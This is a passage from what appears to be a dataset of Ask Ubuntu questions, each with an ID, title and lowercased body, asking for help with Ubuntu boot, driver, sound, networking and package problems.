is not installed . mysql-workbench-gpl depends on python-paramiko ; however : package python-paramiko is not installed . mysql-workbench-gpl depends on mysql-client ; however : package mysql-client is not installed . mysql-workbench-gpl depends on python-pysqlite2 ; however : package python-pysqlite2 is not installed . dpkg : error processing mysql-workbench-gpl ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for python-gmenu ... rebuilding /usr/share/applications/desktop.en_us.utf8.cache ... processing triggers for hicolor-icon-theme ... processing triggers for shared-mime-info ... processing triggers for python-support ... errors were encountered while processing : mysql-workbench-gpl
420056	grub loader not erasing	i uninstalled ubuntu 13.10 , but now the grub loader wo n't go away . i did the windows repair mbr command solution , but it is still there . i 'm trying to install chimera and the grub is getting in the way . any help is appreciated !
420061	several issues when trying to start jack server .	configured or not starting jack server always results in this crash on my machine : jack server starting in realtime mode with priority 10 error : control open `` /dev/audio '' ( no such file or directory ) error : can not register object path `` /org/freedesktop/reservedevice1/audio0 '' : a handler is already registered for /org/freedesktop/reservedevice1/audio0 error : failed to acquire device name : audio0 error : a handler is already registered for /org/freedesktop/reservedevice1/audio0 error : audio device hw:0 can not be acquired ... error : can not initialize driver error : jackserver : :open failed with -1 error : failed to open server i have a midi keyboard connected i want to get to work . does anyone know what could cause this issue and how to solve it ?
420065	ubuntu in virtual machine behind proxy ca n't ping	i installed ubuntu 12.04.desktop on vmware . i 'm connecting to the internet through a proxy . i can browse with firefox , but when i try to ping any domain , i get this message : 12 packets transmitted , 0 received , 100 % packet loss , time 11089ms i put my proxy in network settings , but that did n't solve the problem . ifconfig : eth0 link encap : ethernet hwaddr 00:0c:29:8e:87 : b5 inet addr:192.168.244.130 bcast:192.168.244.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fe8e:87b5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4001 errors:0 dropped:0 overruns:0 frame:0 tx packets:2706 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4826988 ( 4.8 mb ) tx bytes:247945 ( 247.9 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:548 errors:0 dropped:0 overruns:0 frame:0 tx packets:548 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:46534 ( 46.5 kb ) tx bytes:46534 ( 46.5 kb )
420066	after ssh session : -bash : /bin/ls : no such file or directory	i 've logged into my ubuntu server from work via putty under windows . right away i noticed something weird . i could not use the ls command . got : -bash : /bin/ls : no such file or directory i did n't pay much attention , i thought it was a putty thing . tonight i 've logged from home via ssh under ubuntu and i get the same problem on my server ! not only that but other commands like find give me the same message . i 've also noticed that all colours are gone in the prompt . if i echo path , i get : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games to replace lsi can use dirand it works , but that 's only a temporary workaround . also i 've tried : ldd /bin/ls gives me is not and dynamic executable what could be the problem ? edit oh and running apt-get updategives me : w : failed to fetch http : //ftp.free.fr/mirrors/ftp.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-en something wicked happened resolving « ftp.free.fr : http » ( -5 - no address associated with hostname )
420067	zentyal on ubuntu 13.10	i tried installing zentyal on my ubuntu 13.10-serve using the ppa-method ( as i do n't want to reinstall the os ) . at first , i added deb http : //archive.zentyal.org/zentyal 3.3 main extra to my sources.list and ran sudo apt-get update , followed by a sudo apt-get install zentyal . stripped by the installation of the dependencies , you can find the installation log here ( unfortunately in german ) : http : //pastebin.com/vln2uwgn . the output at the end of the log is just the output from etckeeper . as stated in the log , the post-install script of zentyal-core failed . thus , i tried running zentyal-core.postinst in /var/lib/dpkg/info . there is some strange behaviour to be observed now . sudo ./zentyal-core.postinst gives : use of uninitialized value $ action in string eq at /usr/share/debconf/frontend line 27. whereas sudo bash zentyal-core.postinst gives : ca n't exec `` zentyal-core.config '' : no such file or directory at /usr/share/perl/5.14/ipc/open3.pm line 186. open2 : exec of zentyal-core.config configure failed at /usr/share/perl5/debconf/confmodule.pm line 59 in case that it matters , my default shell is fish ( but not for root , that one is using bash ) . after removing the post-install script , dpkg runs fine , but pointing firefox at my server just shows the default apache welcome page ( `` this is the default webpage ... blah blah '' ) . any ideas ?
420068	question regarding install on fresh drive	quick question the hard drive on my 4+ year old vaio laptop crashed . i contacted sony to get the recovery disk , but they want me to pay $ 160 for windows and drivers . i have hence decided to go the linux way instead . the sony vaio representative said that i needed to buy the cd from them anyway because it contains the drivers necessary for the machine to work and not crash . my question is - can i just put in a new ssd hard drive , install linux , and then look for the drivers or would my system crash again ? thanks !
420070	bluetooth keyboard does not work on ubuntu 13.10	i have installed ubuntu 13.10 on lenovo b520 ( all-in-one ) . after installation keyboard not worked , mouse ca n't scrolling , bluetooth not recognized ... touch screen not correct ! some interesting facts : after some time ( i just watched video ) , all worked perfectly ( bluetooth still not recognized ) , i was happy : ) , but after some time its not working till now . in boot screen , i can use keyboard ( choosing operation system by arrow keys and enter to ubuntu ) . but when it starts , keyboard stops working . when i pressing any key on my keyboard , the bluetooth indicator flashing , like he know that there are something , but it types nothing . can anyone help me please ? how can i find drivers or make bluetooth on ? thanks
420071	can i install ubuntu onto my craig clp281a netbook ?	i have a craig clp281a android 4.0 net book . how can i install a different os on that device ?
420072	remove/downgrade kernels of a point release	currently building a 12.04.4 ( 3.11.x ) lts lamp server and have a 12.04.3 ( 3.8.x ) one in production . how can i remove the 3.11 kernels and headers with the lts-raring generic packages and install 3.2.0-x kernel , headers , and generic packages ? also , ease of updating to newest 3.2.0-x patch is important without risking updating/reverting to 3.11 or 3.8 in the process . is there gotchas or no nos with doing this ?
420077	is it possible to put multiple operating systems on a single cd/dvd ( not usb ) and be able to run them individually ?	how do i install like fedora and ubuntu on the same cd so i do n't have to have like 20 cd 's for os 's ?
420078	upgrade to raid	i have a system running ubuntu server latest main version and i have it running on a single disk . i have installed another identical hard drive in the machine and i would like to convert this machine to raid 1 . i know how to do this on the install , but i do n't want to have to go through the trouble of reconfiguring my lamp servers . is there a quick way to save the system configuration and data to another drive or usb stick , reinstall the server with the raid configuration and then re-install my lamp system . alternatively , can anyone suggest a better way to accomplish the same task ? a pointer to a howto would be very much appreciated or some step by step instructions would be gratefully received . tim
420080	first launch from usb drive	i recently downloaded , prepared to use from usb and launched ubuntu 13.10 , but as it is for now i 'm getting only problems . this is what i get when launching any of all boot options : calling test-builtin error reading /lib/udev/hwdb.bin : no such file or directory load module index unload module index this repeats two or three times ( i do n't know why , it 's random ) and then sometimes i got : /init error in line 7 : ca n't open /dev/sr0 also repeated few times , and sometimes it goes to generating locales ( no matter what language i choose before [ basically working in polish ] always en_us , after that the only thing i can write cause it 's for a second or something is [ 57. ( ... ) thermal ( ... ) and computer is going down . no reboot , just shutdown . can somebody help me to resolve this one ?
420085	no sound out of built-in speakers lenovo thinkpad e525 ubuntu 12.04	i 'm running ubuntu 12.04 ( lts ) on my lenovo thinkpad edge e525 and i ca n't seem to get any sound out of the built-in speakers on my notebook . i have tried rebooting , purging alsa , reinstalling and more and ca n't seem to get the thing to work . the same thing has happened on linuxmint 16 . when i do `` cat /proc/asound/cards '' i get the following output graham @ graham-laptop : ~ $ cat /proc/asound/cards 0 [ generic ] : hda-intel - hd-audio generic hd-audio generic at 0xf0b44000 irq 47 1 [ generic_1 ] : hda-intel - hd-audio generic hd-audio generic at 0xf0b40000 irq 16 4 [ thinkpadec ] : thinkpad ec - thinkpad console audio control thinkpad console audio control at ec reg 0x30 , fw unknown sound works perfectly fine , though if i plug in headphones into the jack socket . can anybody help ?
420091	h.264 vlc issues ubuntu 12.04	im trying to play .264 files on vlc but those efforts are wasted ! i tried downloading most of the codec referred by people on the forum still no success ! ! can anyone help me out playing these files on vlc only ! ! thanks in
420094	how to make fn keys work correctly ?	i am using ubuntu 13.10 with hp envy dv7 . fn keys are not workin correctly here , like in invert option ! when i press for example f2 - id like to change name of any file its not workin , it is changin by brightness like i would press fn key with f2 and its all the same on every 'f ' key . any ideas how to make it work good ? ? i have installed nvidia-prime and nvidia closed drivers .
420095	precautions to take before replacing hard drive in desktop	i am using ubuntu .my hard disk is aged so i have to change it.i want to keep my data as it is and if possible.can any one please guideline some points .steps to take for successful hard disk replacement in ubuntu 13.10
420099	13.04 nautilus strange lagging while listing or coping files	i have installed ubuntu 13.04 few weeks ago , before i was using arch linux with gnome shell . i had to use ubuntu server 13.04 ( choice project i work on related ) and installed x with gnome shell on the top of it for everyday use . i noticed strange behavior when i open some folders or try to copy multiple files . same thing happens no matter how big or how many files there is . when i open folder it loads for a very long time , takes like 60s to list files inside . doesnt happen all the time ( 50 % of it ) and on multiple partitions and on usb sticks too . when i create new folder it tends to lag to while renaming too . it works fine with arch on second partition . i have no idea where to look for a reason , only nautilus extension i use is open-terminal . i use lenovo laptop with single 500gb hdd .
420100	pov ray installation - configure error	i am trying to install pov-ray 3.7 stable version . i downloaded the source code from github repo . i followed the instruction for unix system which is described in the readme file . unfortunately i get error message when i run configure command . ./configure compiled_by= '' your name < email @ address > '' the first error said that it could not find the boost library 1.37 or higher , so i installed the libraries . sudo apt-get install libboost-all-dev now i can locate them as below : /usr/lib/x86_64-linux-gnu/libboost_date_time.so.1.53.0 /usr/lib/x86_64-linux-gnu/libboost_iostreams.so.1.53.0 /usr/lib/x86_64-linux-gnu/libboost_program_options.so.1.53.0 /usr/lib/x86_64-linux-gnu/libboost_python-py27.so.1.53.0 /usr/lib/x86_64-linux-gnu/libboost_python-py33.so.1.53.0 /usr/lib/x86_64-linux-gnu/libboost_system.so.1.53.0 /usr/lib/x86_64-linux-gnu/libboost_thread.so.1.53.0 and i tried to run the configure again , and the error message is like this . ... checking for boostlib > = 1.37 ... yes checking whether the boost : :thread library is available ... yes checking for exit in -lboost_thread ... yes checking whether the boost thread library is usable ... no configure : error : in `/usr/local/povray-3.7-stable ' : configure : error : can not link with the boost thread library see `config.log ' for more details so i put additional option -- with-boost-libdir=/usr/lib/x86_64-linux-gnu/ , but it was n't successful either . can anyone tell me what i am missing ?
420101	ubuntu 12.04 sometimes crashes and has colors messed up each time i restart my notebook due to amd radeon hd 8850m video card drivers bug ?	i am a somewhat inexperienced ubuntu user , so do n't be too harsh on me : i 've been trying to solve this issue for a while , thus any help i get will be extremely appreciated . i 've just acquired a dell latitude 3540 with a amd radeon hd 8850m video card and the first thing i did was to go for a dual boot ubuntu and windows 8 installation . i do n't know whether the issues i 'm facing are related to what i did after the installation was over or not , so , just in case , i 'll let you know everything i did . as soon as the installation finished , i wanted to check if windows 8 had been compromised , however , i was unable to check that because grub did n't load as i expected . fortunately , it was all right and i was able to fix grub with the boot repair tool , following the instructions here : https : //help.ubuntu.com/community/boot-repair i also had some brightness issues , which i was also able to solve following the instructions in a blog . and that 's pretty much it . now the real issue here is , each time i restart ubuntu , before the login screen appears i get what was supposed to be a screen similar to this `` http : //s205blog.files.wordpress.com/2012/11/ubuntu_splash.png '' with the colors all messed up ( the background is all black and the little circles that are white are all red ... the ubuntu logo does n't even show up ) . any ways , it is n't much of a big deal , 'cause after the login screen appears everything comes back to normal , but the problem is that about 1 out of 10 times i restart the notebook , ubuntu crashes while this screwed up screen is on . well , i do n't really know what 's causing this , but i am guessing it is the video card . i even tried to install the proprietary driver amd catalyst driver for my video card without success . would someone please clear up what 's going on for me ? or is this issue a lost cause ? thanks in advance . edit : i am not sure whether this will help , but sometimes , instead of the screwed up loading screen i get a command line screen with some of these warnings : `` more than 8 outputs detected '' or `` broken pipe '' .
420105	install ubuntu on sony svf14	i 've tried to install ubuntu 12.10 , 13.04 , 13.10 in my vaio svf14 , but when it restarted after finished the installation just said operation system not found . does someone know if it 's possible to install ubuntu in a vaio ? please , i need install ubuntu ! p. s. : i used wubi.exe . and my computer came with windows 8 pre-installed . first i tried to install along with windows , then when it was to create the partitions , it did n't recognize the windows . so , i tried to replace , then happened what i said above . i also changed the boot system from uefi to legacy and disabled the security boot . thanks ! ! !
420108	gedit trying to install it on ubuntu 13.10 i386 32 bit version on acer z5101	hi i am trying to install gedit and get the following response in terminal gary @ lucifer-black : ~ $ gksudo gedit /etc/pm/config.d/config the program 'gksudo ' is currently not installed . you can install it by typing : sudo apt-get install gksu gary @ lucifer-black : ~ $ sudo apt-get install gksu [ sudo ] password for gary : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gksu gary @ lucifer-black : ~ $ any help would be appreciated please
420111	ubuntu higher cpu usage than in windows	so , i 've always been a windows user , and a die hard windows fanboy . ( enjoying pc gaming ) . recently i 've been trying linux , ubuntu and kubuntu . and i must say , i 'm really impressed - i really like it . i 'm having quite a few issues . my cpu usage is constantly extremely high . about 10-20 % while not using my computer , and just showing desktop . while viewing a youtube video it 's often 70-80 % . i am also very often experiencing system errors . my specs are the following : intel i5 3570 asus gtx 670 8 gb kingston ram 500 gb hdd dualboot with windows 7 . it 's a fresh install of ubuntu 13.10 .
420115	what else do i need to close the lid on hp pavilion g7 running ubuntu 13.10 ?	hp pavilion g7 is running under ubuntu 13.10 and have an external monitor ( connected to hdmi port ) . power settings configured to : `` when the lid is closed '' - `` do nothing '' ( both on battery and when plugged in ) . still , when lid is closed ubuntu goes to sleep . what else do i need to make hp work with closed lid ? thanks
420119	how to get cpu usage percentage on ubuntu	i 've typed this command to get the history of cpu usage : dstat -ta -- top-cpu and got data as the following : my question is what type of data from the previous result should i take to compute the usage like the following :
420126	laptop reboots , but fails to power down	i 'm also having this problem . i 'm able to reboot my laptop ( even though there is a bit of a delay ) , but my computer never powers off ( unless i hold down power button ) . i 've tried adding both 'reboot=bios ' and 'reboot=bios ' to 'grub_cmdline_linux_default ' and neither one has any effect . i also tried 'acpi=off ' which was suggested here . unfortunately , this did n't resolve the shutdown issue either . i 'm currently using xubuntu 13.10 $ uname -ior 3.13.0-031300rc8-generic x86_64 gnu/linux
420127	kernel 3.13 on ubuntu arm + android kernel options compatibility	i 've installed ubuntu 12.04 lts with the kernel 3.13 on my arm samsung / google chromebook , using this tutorial : http : //www.virtualopensystems.com/en/solutions/guides/kvm-on-chromebook/ i have to say that ubuntu works really good . now i would like to add the android kernel options inside the .config file of the kernel . can you explain to me , please , why when i add the options listed below to the kernel they disappear after the recompilation ? if i look inside the .config file after the kernel is re-compiled , i do n't see them anymore ! ! these are the options that i need to enable : config_android=y config_android_binder_ipc=y config_ashmem=y config_android_logger=y config_android_persistent_ram=y config_android_ram_console=y config_android_timed_output=y config_android_low_memory_killer=y maybe because this kernel is not compatible with android ? what should i do to make it what i want ? thanks .
420128	ubuntu on andriod tablet ?	i got a small 7 ' tablet made by denver eleectronics model tac70061 , runs on android 4.1 would like to install ubuntu as os instead so i can get the same futures as on my labtop- is it possible and how doi get started ? best regards sergej
420129	smbmount with two nics	my office desktop has to access to two different lans . one lan is connecting to the lab servers and the other is to connecting to the it department lan where i have a network drive there . i have setup two nics for that and it seems to work fine initially . but since last year or so , i can no longer mount to my network drive in one lan unless i disable the nic to another lan . my smbmount command is something like smbmount \\xxx.xxx.xxx.xx\folder $ ~/folder -o username=xxxxx , password=xxxxx , ip=xxx.xxx.xxx.xx i understand that using two nics at the same time is discouraged . but i do n't think i have another option . i am almost giving up on this and just disconnect my other connection whenever i need to mount to my network drive . but it is a nuisance especially when i forgot to unmount the drive before i restart the other nic . the network folder essentially hangs my home folder ( ls wo n't run , for example ) and i just have to reboot .
420132	powertop html file not providing echo commands	i have been trying to improve the power consumption of my lenovo z580 running ubuntu 12.04 . powertop looks like one promising lead and i have been following the instructions provided here : how do i make powertop changes permanent ? i can unplug my laptop and run sudo powertop -- html and i get an html file . unfortuanately the `` software in need of tuning '' section does not seem to contain the needed commands for modifying my rc.local file . rather , it only contains a list of mistuned software . note that i have not temporarily set any parameters to `` good '' under `` tunables '' . i would like to know if anyone can suggest what might be making the commands that i need not show up in the html file . thanks !
420141	how do i change the video device used by flash ?	my machine has both a usb webcam and a pci tv tuner card . when using flash webcam support flash uses the tv tuner card as the video device . this means that instead of showing my webcam image it will show whatver is on tv right now . how can i change this so that flash will use my webcam ?
420145	can only access 1.9 gb of ram on ubuntu 12.04	so i installed ubuntu 12.04 ( edit : 64-bit ) on my pc . my pc had 4 gb of ram installed , which the bios recognizes . it also displays when i type uname -m , so the os knows it 's there . however , according to the system monitor , i have access to 1.9 gb . unfortunately , my computer 's performance seems to be in line with the latter report . i have tried : re-seating my ram flashing my bios disabling integrated video buying new ram ( bringing me to a total of 8 gb ; still only 1.9 are being used ) i saw a similar question that it 's an issue that occurs in kernels newer than 2.6.32 ; is there some way i can downgrade to an older kernel to use all my ram ? edit : here 's my bios mapping . note the various `` reserved '' sections . i 'm 90 % sure those do n't need to be there . [ 0.000000 ] e820 : bios-provided physical ram map : [ 0.000000 ] bios-e820 : [ mem 0x0000000000000000-0x000000000009e7ff ] usable [ 0.000000 ] bios-e820 : [ mem 0x000000000009e800-0x000000000009ffff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x00000000000e0000-0x00000000000fffff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x0000000000100000-0x000000007d7b2fff ] usable [ 0.000000 ] bios-e820 : [ mem 0x000000007d7b3000-0x000000007d98afff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x000000007d98b000-0x000000007d994fff ] acpi data [ 0.000000 ] bios-e820 : [ mem 0x000000007d995000-0x000000007dd84fff ] acpi nvs [ 0.000000 ] bios-e820 : [ mem 0x000000007dd85000-0x000000007e159fff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x000000007e15a000-0x000000007e15afff ] usable [ 0.000000 ] bios-e820 : [ mem 0x000000007e15b000-0x000000007e360fff ] acpi nvs [ 0.000000 ] bios-e820 : [ mem 0x000000007e361000-0x000000007e7fffff ] usable [ 0.000000 ] bios-e820 : [ mem 0x00000000f8000000-0x00000000fbffffff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x00000000fec00000-0x00000000fec00fff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x00000000fec10000-0x00000000fec10fff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x00000000fec20000-0x00000000fec20fff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x00000000fed00000-0x00000000fed00fff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x00000000fed61000-0x00000000fed70fff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x00000000fed80000-0x00000000fed8ffff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x00000000fef00000-0x00000000ffffffff ] reserved
420147	lubuntu three monitor setup - make middle one primary - tray icons not appearing ( 3rd monitor has smaller resolution )	i just installed lubuntu 13.10 on my desktop . i successfully installed and configured arandr . this is my current monitor setup ( from left to right ) : 1st : 1920x1200 2nd : 1920x1200 3rd : 1680x1050 the problem is that the taskbar is extended to the 3rd monitor and the tray icons are hidden . ca n't see them . also , i want to make the 2nd monitor primary instead of the 1st . what should i do ?
420148	rsync setup : can not get rsync command to work	i 've been trying to successfully run rsync for days and come close , but still have no idea why it 's not working ... and i am getting further away from success . i posted the below input and resulting error . i 'm trying to send files from some my online storage on some sort of *nix server to my ubuntu home server . any help would be much appreciated . darth @ xwing : ~ $ sudo rsync -- remove-source-files -avzhe ssh zjohnson @ server.feralhosting.com : /box/rsync /box/rsync/ debian gnu/linux 7 receiving incremental file list rsync : change_dir `` /box '' failed : no such file or directory ( 2 ) sent 8 bytes received 12 bytes 5.71 bytes/sec total size is 0 speedup is 0.00 rsync error : some files/attrs were not transferred ( see previous errors ) ( code 23 ) at main.c ( 1536 ) [ receiver=3.0.9 ] darth @ xwing : ~ $
420151	how do i configure grub so it does n't try to run if the drive its installed on is disconnected	i recently installed ubuntu 13.0 something in my pc where i upgraded my previous version 12.10 . nothing is wrong with ubuntu itself . it 's grub , that 's the problem . i keep my ubuntu on a separate partition in an external hard drive around the size of 1tb . grub is also located in this drive . but my problem is that grub attempts to start up on the computer even though it is n't there which means i have to plug in my hard drive every time i restart . is there any way i can work around this configuration ? or will it go away if i reinstall ubuntu on the partition but in a different way ?
420153	network manager vpn does n't update resolve.conf with nameserver	when i connect vpn via networkmanager , i ca n't access resources by domain name . but it 's ok using ip . seems like networkmanager is n't updating resolve.conf with vpn nameservers . i 've visited and tried this and this none of them work . i installed a 13.04 server edition then upgraded to 13.10 . i then run apt-get install ubuntu-desktop -- no-recommends to change it to desktop version . after that install network manager etc by hand . my networkmanager.conf [ main ] plugins=ifupdown , keyfile , ofono # dns=dnsmasq [ ifupdown ] managed=true my /etc/network/interfaces content # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto em1 iface em1 inet dhcp my /etc/resolv.conf which is a link to ../run/resolvconf/resolv.conf ( and i have run dpkg-reconfigure resolveconf and answered yes . what else do i need to do ?
420155	installing ubuntu without sharing a windows partition or replacing windows	i am quite new to linux and the concept of using dual operating systems . i am aware that the ubuntu installer gives the options of sharing the windows partition or replacing windows . i would like to do neither of these . i have a notebook with and ssd and two hdds . the ssd ( c : ) houses windows os and the first hdd ( e : ) is used for windows file storage . i would like to retain both of these drives as is and install ubuntu on the second hdd ( potentially f : ) , which is currently blank and unformatted ( brand new ) . i would also like to have the os choice option on boot up that would be given if ubuntu were installed sharing the windows partition . is this possible ? if this is doable , how do i go about doing it ?
420159	software and updates not running after update to ubuntu 13.10	whenever i try to open the 'software and updates ' section in settings , i get an internal error : nothing else happens . weh i try running it from the terminal , i get this : navnav @ navnavnav : ~ $ /usr/bin/software-properties-gtk fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 14 : reading configurations from ~/.fonts.conf is deprecated . gpg : /tmp/tmp18jh65/trustdb.gpg : trustdb created traceback ( most recent call last ) : file `` /usr/bin/software-properties-gtk '' , line 103 , in < module > app = softwarepropertiesgtk ( datadir=options.data_dir , options=options , file=file ) file `` /usr/lib/python3/dist-packages/softwareproperties/gtk/softwarepropertiesgtk.py '' , line 173 , in __init__ self.show_distro ( ) file `` /usr/lib/python3/dist-packages/softwareproperties/gtk/softwarepropertiesgtk.py '' , line 358 , in show_distro self.block_handlers ( ) file `` /usr/lib/python3/dist-packages/softwareproperties/gtk/softwarepropertiesgtk.py '' , line 348 , in block_handlers if widget.handler_is_connected ( self.handlers [ widget ] ) : file `` /usr/lib/python3/dist-packages/gi/overrides/gobject.py '' , line 429 , in wrapper return func ( _get_instance_for_signal ( obj ) , *args , **kwargs ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 113 , in function return info.invoke ( *args , **kwargs ) typeerror : argument instance : expected gobject.object , but got pycapsule this worked fine on 13.04 , it 's just started happening on 13.10 . any ideas ?
420160	how do i update `ubuntu-themes` ?	i 'm super annoyed by a bug that has supposedly been fixed in `` ubuntu-themes '' but i am on 13.10 and i do n't even see an `` ubuntu-themes '' package . sooo ... what package should i be looking for ?
420164	amd drivers issue ( 12.10 )	so , i 've been having to battle various issues with ubuntu - mostly power and heating issues on my laptop - gets up to 60c on compiling code which is fairly unreasonable . one of the things suggested was to install the closed-source amd drivers . upon doing so ( installing flgrx , linux-headers and doing sudo amdconfigure ) and rebooting , the laptop physically wo n't connect to my home wifi network . it recognizes the network and can sometimes work for a fraction of a second , but most of the time it physically can not connect . never experienced such issues until installing the drivers . using xubuntu/12.10/latest drivers . radeon hd 7xxx series - toshiba satellite .
420170	12.04 can not connect to ipevo mini-as-server	the ipevo mini was connected as a ftp but then when i booted the next day the and tried to connect to the server i got permission denied for the first time and now i ca n't access the file server .
420171	unity-scope-clementine showing songs which no longer exist	i 've recently backed up some of my music collection which i do n't listen to regularly to an external hd and deleted them from my internal hd . for some reason these songs are still listed as part of my music collection when opening the clementine 's music scope . when right-clicking on the songs from the lens : each missing song has the track number of '-1 ' ; 'open in folder ' option does nothing ; 'play ' does nothing too , as you 'd expect . is there a option file/database i can edit to stop these phantom songs from displaying in error ?
420172	install nibabel for python 3	how can i get the nibabel module for python 3 ? only the nibabel module for python 2 is in the repository .
420175	slow internet connection after upgrading to 13.10	i recently upgraded my desktop from ubuntu 13.04 to 13.10 . before the upgrade i was getting the speeds that my isp said i was getting which was 5mbps , however , after i upgraded to 13.10 my speeds instantly dropped to 138 kbsp but all my other computers are registering the 5mbps . my desktop is connected to switch via cat5e . can someone please help make my computer fast again ?
420179	launcher bar and window sizing	hi have installed ubuntu from a cd-rom on presario 2200 and have following issues : no launcher bar ca n't figure out how to turn off ubuntu one does n't let me log on please help his nube
420181	how to forward proxy ports on ubuntu	pleas help me friends , i want to forward a local-host port from command line.i want to forward 127.0.0.1:8085 to 127.0.0.1:9666. i searched it everywhere but , i have n't proper answer yet .
420182	no audio devices in input or outoput ( ubuntu 13.10 )	all my audio was working fine then it stopped . now all i can get out is audio from my headphone jack . there are no audio devices in the sound settings in either input nor output . i tried do sudo alsa force-reload and deleting the pulse folder in /run/user/1000 . neither worked .
420185	bumblebee can not acess secondary gpu failed to load /usr/lib/xorg/modules/libglamoregl.so	i have spent countless hours searching for a solution to my problem and i can not seem to find the answer to my problem . i have a hybrid gpu ( intel/nvidia ) and i have bumblebee installed to use the nvidia card when i want to play games or something like that . when i try the optirun command i get this error : [ 63.433096 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) failed to load /usr/lib/xorg/modules/libglamoregl.so : /usr/lib/xorg/modules/libglamoregl.so : undefined symbol : _glapi_tls_context here is my bumblebee config file : configuration file for bumblebee . values should not be put between quotes server options . any change made in this section will need a server restart to take effect . [ bumblebeed ] the secondary xorg server display number virtualdisplay=:8 should the unused xorg server be kept running ? set this to true if waiting for x to be ready is too long and do n't need power management at all . keepunusedxserver=false the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee card power state at exit . set to false if the card shoud be on when bumblebee server exits . turncardoffatexit=false the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will be ignored . noecomodeoverride=false the driver used by bumblebee server . if this value is not set ( or empty ) , auto-detection is performed . the available drivers are nvidia and nouveau ( see also the driver-specific sections below ) driver= directory with a dummy config file to pass as a -configdir to secondary x xorgconfdir=/etc/bumblebee/xorg.conf.d client options . will take effect on the next optirun executed . [ optirun ] acceleration/ rendering bridge , possible values are auto , virtualgl and primus . bridge=auto the method used for virtualgl to transport frames between x servers . possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy list of paths which are searched for the primus libgl.so.1 when using the primus bridge primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus should the program run under optirun even if bumblebee server or nvidia card is not available ? allowfallbacktoigc=false driver-specific settings are grouped under [ driver-name ] . the sections are parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- detection resolves to name ) . pmmethod : method to use for saving power by disabling the nvidia card , valid values are : auto - automatically detect which pm method to use bbswitch - new in bb 3 , recommended if available switcheroo - vga_switcheroo method , use at your own risk none - disable pm completely https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] module name to load , defaults to driver if empty or unset kerneldriver=nvidia-current pmmethod=auto colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-current : /usr/lib32/nvidia-current comma-separated path of the directory containing nvidia_drv.so and the default xorg modules path xorgmodulepath=/usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau i have the nvidia geforce gtx 770m gpu with 3gb of dedicated ram . if you need more info just hollar , and i apologise for the messed up config file ( in terms of formatting ) i left all of the # 's in the file .
420187	sensible/correct way to edit the files provided by base-files package ?	i understand the package base-files provides the debian base system miscellaneous files such as /etc/issue , /etc/lsb-release ( in the specific case of ubuntu ) or /etc/os-release . i 'd like to know what is the most sensible way or the correct way to edit these files , would simply edit them via nano or a graphical text editor do the job ? . ( i 'm aware that as i edit those files they will be overridden once the package is updated ) .
420188	how to delete table cells in libreoffice draw ?	how do i delete a whole table row in libreoffice draw . please answer quickly because it is due my project is due tomorrow .
420189	read error message	i am new to ubuntu and did an install of 13.10 on a laptop . i get an error message error : opening the cache ( e : read error-read ( 5 : input/output error ) , e : the package lists or status file could not be parsed or opened . ) ' how do i correct this ?
420192	how to install ubuntu in a hp envy 15 ?	intel core i7 16 gb ram windows 8 64bits nvidia geforce gt 740m when i run ubuntu from a usb the program said that there 's not a os in the machine , but i have windows 8 . what can i do to install both os ?
420198	problem booting ubuntu on gigabyte z77x-ud3h ?	this is a custom built computer . i plan on dual booting windows eventually to take advantage of a radeon 7870 graphics card currently installed . i originally had just windows installed . i grew impatient trying to figure out how to dual boot linux so i just clean installed ubuntu 12.04 installation went smoothly . restart , wo n't boot . at first from reading other questions i thought it was the bios because i turned off intel support for vm . turned it on and saved config , same problem . i run the usb installation usb stick to see if tehre is a disk error . it found 1 error in a file . it went too fast . i noticed it could n't find some file somethingx86_64.deb . then it looked through ./casper/squashfs.filesystem before simply saying it found one error in a file . i tried to run the trial version from the usb stick over the installation and try installing updates . i remember one failing to install i plan on trying again tomorrow . oh crap i do n't think i installed any drivers . edit : i did n't find anything driver related for my motherboard . only for the graphics card ( which is disabled in bios : i set the graphics to use the integrated graphics on the chip ) i need some help . edit2 : with oldfred 's suggestion and url : i did : sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update sudo apt-get install -y boot-repair & & boot-repair repair window came up : i checked : under advanced options : reinstall grub , use standard efi file backup and rename window efi files ( i did n't really know what this meant , i did have windows installed previously , but got frustrated trying to dual boot linux so decided to clean install ubuntu then i 'm gon na try dual booting from 